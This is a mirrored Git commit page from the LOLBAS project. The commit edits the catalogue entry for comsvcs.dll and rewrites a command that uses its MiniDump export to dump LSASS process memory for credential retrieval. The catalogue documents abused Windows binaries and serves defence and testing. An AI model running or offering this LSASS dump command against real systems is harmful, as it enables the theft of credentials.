public-mirrors/LOLBAS
1
0
Fork 0
mirror of https://github.com/LOLBAS-Project/LOLBAS synced 2025-07-29 05:31:53 +02:00
Code Issues Projects Releases Wiki Activity

Addressing @bohops's feedback

Browse Source
This commit is contained in:
Wietze
2022-05-05 11:12:22 +01:00
parent 085aaa37b1
commit b92ee99627
11 changed files with 25 additions and 45 deletions
Download Patch File Download Diff File Expand all files Collapse all files

2
yml/OSLibraries/comsvcs.yml
View File

@@ -4,7 +4,7 @@ Description: COM+ Services
Author:
Created: 2019-08-30
Commands:
- Command: rundll32 C:\windows\system32\comsvcs.dll MiniDump "[LSASS_PID] dump.bin full"
- Command: powershell /c rundll32 C:\windows\system32\comsvcs.dll MiniDump [LSASS_PID] dump.bin full
Description: Calls the MiniDump exported function of comsvcs.dll, which in turns calls MiniDumpWriteDump.
Usecase: Dump Lsass.exe process memory to retrieve credentials.
Category: Dump